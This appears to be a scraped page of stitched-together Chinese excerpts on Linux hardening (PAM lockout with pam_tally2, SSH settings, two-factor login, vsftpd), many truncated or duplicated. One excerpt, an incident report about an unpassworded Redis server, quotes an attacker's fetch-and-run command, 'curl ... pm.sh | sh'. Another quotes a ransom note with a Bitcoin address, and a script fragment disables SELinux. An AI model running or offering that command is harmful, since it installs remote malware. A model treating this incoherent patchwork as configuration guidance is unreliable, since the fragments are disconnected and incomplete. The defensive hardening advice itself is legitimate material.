本文不一定适合比较老版本的Linux,如果只关心使用,请直接看“总结”,本文主要针对CentOS,其它Linux发行版本类似,但细节可能有出入,比如重启服务可能不是用systemctl,而是service等。
写作本系列文章的背景是我们要在大数据平台/企业数据湖场景下给出中心化的用户身份认证方案。此前,我们实现过Windows AD + Kerberos的集成方案,由于Windows AD是LDAP和Kerberos的双重实现,这种天然优势使得Windows AD可以实现真正意义上的(大数据集群的)Kerberos账号与企业用户账号的统一管理。当我们想在OpenLDAP + Kerberos上实现同样的目标时,发现这一领域的知识与方案琐碎而凌乱,缺少统一连贯,脉络清晰的讲解,在经过大量技术调研和系统梳理后,我们特别撰写了本系列文章,希望可以借此将这一话题全面彻底地阐述清楚。本系列由三篇文章组成,将沿着“如何集成OpenLDAP与Kerberos实现统一认证管理”这一主线推进,在实现过程中会详细介绍使用到的技术和原理并给出完备的执行脚本用于实际环境的搭建。我们假设读者已经具备OpenLDAP和Kerberos的基本知识,不再对两者进行单独介绍。
本文要实现的功能:如果有人恶意尝试破解你的服务器密码,那么这个功能就能帮你起到一定的作用,当尝试密码错误超过设定的次数后,就会锁定该账户多长时间(自行设定),时间过后即可自行解锁,这样可以增加攻击者的成本。
Linux 系统安全与优化配置 Linux 系统安全问题 ---- 目录 1. Openssh 安全配置 1.1. 禁止root用户登录 1.2. 限制SSH验证重试次数 1.3. 禁止证书登陆 1.4. 使用证书替代密码认证 1.5. 图形窗口客户端记忆密码的问题 1.6. 关闭 GSSAPI 1.7. 禁止SSH端口映射 1.8. IP地址限制 2. Shell 安全 2.1. .history 文件 2.2. sudo 安全问题 2.3. 临时文件安全 2.4. 执行权限 3. 防火墙 3.1. 策略
# description: The telnet server serves telnet sessions; it uses \
SuSE上的一些问题,可能需要另参考:http://blog.chinaunix.net/u2/64804/showart.php?id=2026903 limits.conf 文件实际是 Linu
Linux 系统安全与优化配置 目录 1. Openssh 安全配置 1.1. 禁止root用户登录 1.2. 限制SSH验证重试次数 1.3. 禁止证书登陆 1.4. 使用证书替代密码认证 1.5. 图形窗口客户端记忆密码的问题 1.6. 关闭 GSSAPI 1.7. 禁止SSH端口映射 1.8. IP地址限制 2. Shell 安全 2.1. .history 文件 2.2. sudo 安全问题 2.3. 临时文件安全 2.4. 执行权限 3. 防火墙 3.1. 策略 3.2. 防止成为跳板机 3.3.
安全加固是企业安全中及其重要的一环,其主要内容包括账号安全、认证授权、协议安全、审计安全四项,今天了解一下购买了腾讯云上的Linux的系统如何加固(CentOS)。
查看账户、口令文件、与系统管理员确认不必要的账户。对于一些保留的系统伪账户如:bin,sys,adm,uucp,lp,nuucp,hpdb,www,daemon等可根据需求锁定登陆
Note: 更改ssh相关配置后需要重启sshd服务 systemctl restart sshd
在linux系统中,用户多次登录失败会被锁定,一段时间内将不能再登录系统,这是一般会用到Pam_Tally2进行账户解锁。
在Linux系统中,用户多次登录失败会被锁定,一段时间内将不能再登录系统,这是一般会用到Pam_Tally2进行账户解锁。
对于用户账户的管理是系统管理员最重要的工作之一。尤其是,对于任何自称安全的linux系统,最受关心的应该是密码安全问题。在本教程中,我将介绍如何在linux上设置严密的密码策略。
针对linux上的用户,如果用户连续3次登录失败,就锁定该用户,几分钟后该用户再自动解锁。Linux有一个pam_tally2.so的PAM模块,来限定用户的登录失败次数,如果次数达到设置的阈值,则锁定用户。
我们都知道 Linux 下 Root 用户的权限是最大的,因此一般不推荐直接使用 Root 用户操作。通常都是使用普通用户,在必要时通过 Sudo 命令来提权。
最近主机受到攻击,原因可能是redis集群没有设置密码(因为快过期了,不想搞得太复杂就没设),然后被人家搞事情了,就被人一把set了些执行脚本,形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥琐啊,我登上主机一看,简直是猥琐至极,不能忍了啊。
使用openldap认证linux的ssh登录本来是很简单的,所以这里只是说下基本操作,后面有空会增加一些比较高级的玩法,比如限制哪些用户登录哪些Linux主机,比如允许特定用户sudo,比如开启ssl。
可能出现的报错 :Permissions 0640 for '/etc/ssh/ssh_host_ed25519_key' are too open.
vsftp (very secure FTP daemon)意为非常安全的ftp进程 特点:小巧|免费 | 安全,是Linux下最受推崇的ftp服务 ---- 安装ftp前要了解:ftp的账户是主机Linux的一个账户,所以最好了解一些Linux终端账户管理的知识,当然不懂也没关系,按照我的步骤一步一步来就好,如果出现无法解决的权限问题(比如sudo 后还是提示没有权限),可以直接在终端切换到 su root,输入root密码,一切搞定 在Linux下创建ftp用户(这里设置用户名:zhaoz
CVM云服务器通过VNC输入正确的密码后无法正常登录,报错Module is unknown
LANG="en_us-utf-8" service rpcbind status
使用新版的macbook或pro都是支持Touch ID。 Touch ID在工作生活中,有哪些妙用。 今天介绍一下我常用的touch id 1password6 新版的1password支持使用t
一般我们考虑到VPS的安全问题的时候,都是更改SSH端口和密码,然后更安全的也就是禁用密码使用密匙登录。方法很久前就水过了,这里再分享一个方法,可以在VPS上安装一个Google Authenticator(谷歌身份验证器),这样我们登录VPS的时候,不仅需要密码正确,而且还要你输入正确的动态验证码才能登录进去,这样安全性就高了不少,这里就说下CentOS、Debian、Ubuntu的使用。
通常,考虑到VPS的安全性,我们会更改SSH端口和密码,然后更安全地禁用密码并使用密钥登录。该方法已在很久以前浇灌了,这是另一种方法方法,您可以在VPS上安装Google Authenticator,这样当我们登录到VPS时,不仅密码正确,而且还需要输入正确的动态验证代码才能登录,因此安全性很高更高。在这里,我们将讨论CentOS,Debian和Ubuntu的使用。
本文为joshua317原创文章,转载请注明:转载自joshua317博客 https://www.joshua317.com/article/122
本文主要给大家介绍了关于linux尝试登录失败后锁定用户账户的相关内容,分享出来供大家参考学习,下面来一起看看详细的介绍吧。
GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)"
11、干掉“You have new mail in /var/spool/mail/root”
对于系统管理员,让产品的系统更安全,免于骇客和黑客的攻击,一直是一项挑战。这是我们关于“如何让Linux系统更安全” 或者 “加固Linux系统“之类话题的第一篇文章。本文将介绍 25个有用的技巧和窍门 ,帮助你让Linux系统更加安全。希望下面的这些技巧和窍门可以帮助你加强你的系统的安全。 1. 物理系统的安全性 配置BIOS,禁用从CD/DVD、外部设备、软驱启动。下一步,启用BIOS密码,同时启用GRUB的密码保护,这样可以限制对系统的物理访问。 通过设置GRUB密码来保护Linux服务器 2. 磁盘
Redhat是目前企业中用的最多的一类Linux,而目前针对Redhat攻击的黑客也越来越多了。我们要如何为这类服务器做好安全加固工作呢?
db_load-T -t hash -f /etc/vsftpd/vftp_vuser /etc/vsftpd/vftp_vuser.db
注意:修改了/etc/security/limits.conf ,必须要重启,才能生效。
在Linux中执行有些程序时,这些程序在执行前首先要对启动它的用户进行认证,符合一定的要求之后才允许执行,例如login, su等。在Linux中进行身份或是状态的验证程序是由PAM来进行的,PAM(Pluggable Authentication Modules)可动态加载验证模块,因为可以按需要动态的对验证的内容进行变更,所以可以大大提高验证的灵活性。 一、PAM模块介绍 Linux-PAM(即linux可插入认证模块)是一套共享库,使本地系统管理员可以随意选择程序的认证方式。换句话说,不用(重新编写)
本人Linux菜鸟一枚,最近项目中有用到对ftp的操作,无奈身边一穷二白,什么都需要从头开始,各种百度和查询资料,千辛万苦,排除万难。终于搭建好服务,顺利访问。
我们都知道登录MySQL数据库时,连接层接入数据库需要经过mysql.user表中,用户名密码的验证才能登录数据库。
上面只是限制了用户从tty登录,而没有限制远程登录,修改sshd文件将实现对远程登陆的限制
Linux是有文件句柄限制的,而且Linux默认不是很高,一般都是1024,生产服务器用其实很容易就达到这个数量 系统总限制是在这里,/proc/sys/fs/file-max.可以通过cat查看目前的值,修改/etc/sysctl.conf 中也可以控制. /proc/sys/fs/file-nr,可以看到整个系统目前使用的文件句柄数量 linux 中数据的含义 /proc/sys/fs/file-nr [root@localhost logs]# cat /proc/sys/fs/fi
#!/bin/bash setenforce 0 # 临时关闭selinux getenforce # 查看selinux状态 sed -i "s/SELINUX\=.*/SELINUX=disabled/g" /etc/selinux/config # 永久关闭selinux,重启系统生效 repo="centos-yum.sh" if [ ! -e $repo ]; then # -e 判断文件存在;参考:Shell if 条件
将默认配置注释掉,添加一行新的配置,默认的配置为允许root登录,但是禁止root用密码登录
本文和等保联系不是很密切,还是说一了些linux里细节一些的东西,所以有可能会浪费你生命中的好几分钟,同时我使用的是centos6。
pam_tally2模块可于用于在对系统进行一定次数的失败ssh登录尝试后锁定用户
最近看到一个网友在问服务器上的数据库被留下了 “To recover your lost Database and avoid leaking it: Send us 0.05 Bitcoin (BTC) to our Bitcoin address 14yVUjTFesHAusWZ8qytA9faYmKfqEFpYv and contact us by Email with your Server IP or Domain name and a Proof of Payment. Your Database is downloaded and backed up on our servers. If we dont receive your payment in the next 10 Days, we will make your database public or use them otherwise.” 可以看到这个网友的服务器显然是被入侵了,类似这位网友的问题也经常可以看到,遇到这样的问题应该如何处理呢? 通常服务器被入侵后被动的解决是无效的这里要么按照留言付“比特币”给黑客要么只能认倒霉。 所以购买服务器前要提前加固好我们的服务器,本节就来介绍Linux服务器安全加固的10条建议。
二次验证是目前比较常用的安全手段,通过设置二次验证,我们可以有效的避免账户密码可能的泄露导致的账户信息泄露,因为每次登陆前我们都需要获取一个一次性验证码,没有验证码就无法成功登陆。二次验证也叫两步验证、两步验证等。本文中老唐将说明如何在 Ubuntu 20.04 上使用 Google Authenticator PAM 模块进行 SSH 和 sudo 身份验证。
在 Arch Linux 的默认配置下,用户在登录系统时如果在 15 分钟内输错密码 3 次,则会被锁定 10 分钟。对于个人电脑来说,只有 3 次输错机会有点少,因为有时候总是会突然多按或少按一个键,或者由于 Capslock 开启的缘故,导致连续几次都出错,很容易被锁定。而一旦被锁定,就要等 10 分钟,除非重启,对于个人用户来说实在太长了。
pam在linux系统中是非常常用,也是非常重要的一个子系统,然而对于pam,我们可能并没有太多的关注其man 帮助文件的说明,最近读了一下pam的man page, 许多不明白的豁然开朗,这里做一个简单的笔记: A. pam.d 是一个目录,一般情况下 关于pam的配置都在这个目录下,其实还有一个配置文件 pam.conf ,不过一般都不存在,而在pam.conf这个配置文件中,关于语法的格式,在man pam.conf 或者man pam.d 的时候,有这么一段:
今天客户反映一个问题,ssh不上自己的服务器了,进机房RedHat Linux本地登录(3级别)的时候发现输入root敲回车的时候出现如下提示:
Linux 是一个开放式系统,可以在网络上找到许多现成的程序和工具,这既方便了用户,也方便了黑客,因为他们也能很容易地找到程序和工具来潜入 Linux 系统,或者盗取 Linux 系统上的重要信息。不过,只要我们仔细地设定 Linux 的各种系统功能,并且加上必要的安全措施,就能让黑客们无机可乘。
通常情况下,一般用户通过执行“su -”命令、输入正确的root密码,可以登录为root用户来对系统进行管理员级别的配置。
领取专属 10元无门槛券
手把手带您无忧上云